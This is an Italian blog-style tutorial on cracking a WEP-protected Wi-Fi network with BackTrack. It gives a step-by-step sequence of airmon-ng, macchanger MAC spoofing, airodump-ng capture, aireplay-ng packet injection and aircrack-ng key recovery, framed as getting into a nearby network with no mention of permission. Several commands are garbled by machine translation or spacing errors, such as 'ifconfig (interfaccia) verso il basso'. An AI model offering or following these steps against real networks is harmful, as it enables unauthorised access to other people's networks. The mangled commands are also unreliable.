Abbiamo già parlato di come connetterci una rete Wi-Fi con protezione WAP attivata con Reaver. Ora, invece, vediamo come crackare un WIFI con protezione WEP grazie a BackTrack.
Di cosa hai bisogno
A meno che non siete un ninja della sicurezza informatica e del networking, è probabile che non abbiate tutti gli strumenti a portata di mano per mettere in atto questa procedura. Ecco di cosa si ha bisogno:
- Un adattatore wireless compatibile: una scheda wireless, ad esempio l’Alfa AWUS050NH che vedete nella foto affianco;
- A BackTrack Live CD: installare BackTrack 3 sul DVD;
- Una rete con protezione WEP nelle vicinanze: il segnale deve essere forte;
Crackare la WEP
Per rompere la WEP, sarà necessario avviare la Konsole, incorporato nella BackTrack nella linea di comando. In primo luogo eseguire il seguente comando per ottenere una lista delle interfacce di rete:
airmon-ng
L’unico che ho non è etichettato ra0
. Il vostro potrebbe essere diverso.
Ora, eseguire i seguenti quattro comandi:
airmon-ng stop (interfaccia)
ifconfig (interfaccia) verso il basso
macchanger - mac 00:11:22:33:44:55 (interfaccia)
airmon-ng start (interfaccia)
Se non si ottengono gli stessi risultati di questi comandi, molto probabilmente la scheda di rete non funziona con questa procedura. Se invece funziona, otterrete un nuovo indirizzo MAC della vostra interfaccia di rete, 00:11:22:33:44:55.
Ora è il momento di scegliere la vostra rete. Eseguite:
airodump-ng (interfaccia)
Per visualizzare un elenco delle reti wireless intorno a voi.
Premere Ctrl + C per fermare la lista. Evidenziare la riga di pertinenza della rete di interesse e prendere atto di due cose: il suo BSSID e il suo canale (nella colonna denominata CH), come illustrato di seguito. Ovviamente la rete che vuoi crackare dovrebbe avere la crittografia WEP (nella ENC) WPA o altro.
Evidenziare il BSSID e copiarlo negli appunti per il riutilizzo nei comandi a venire. Ora stiamo andando a guardare cosa sta succedendo con quella rete che si sceglie e acquisire le informazioni in un file. Esegui:
airodump-ng-c (canale)-w (nome file) - bssid (BSSID) (interfaccia)
È possibile utilizzare il Shift + Insert per incollare nel comando. Inserisci una descrizione per nome del file. Ho scelto “yoyo“, che è il nome della rete che sto crackando:
Otterrete un output simile a quello che c’è nella foto accanto. Aprire una nuova finestra Konsole in primo piano e inserire questo comando:
aireplay-ng -1 0-a (BSSID)-h 00:11:22:33:44:55-e (ESSID) (interfaccia)
Qui l’ESSID è il nome SSID del punto di accesso, che nel mio caso è yoyo:
aireplay-ng -3-b (BSSID)-h 00:11:22:33:44:55 (interfaccia)
Dopo pochi minuti, inizierà la lettura e scrittura dei pacchetti. Si deve attendere che i dati vengano raccolti per eseguire il crack. A seconda della potenza della rete, questo processo potrebbe richiedere un certo tempo. Attendere fino a che i dati # vadano oltre i 10k. In effetti, potrebbe essere necessario più di 10k.
Una volta raccolti i dati sufficienti, è il momento della verità. Avviare una terza finestra Konsole ed eseguire il seguente comando:
aircrack-ng-b (BSSID) (file name-01.cap)
Qui il nome del file dovrebbe essere quello immesso in precedenza. È possibile selezionare la directory Home per vederlo: è quello con .cap come estensione.
Se l’operazione riesce, ci ritroveremo una schermata simile a questa:
La chiave WEP appare accanto a “KEY FOUND“. Eliminare i due punti ed entrate per accedere alla rete.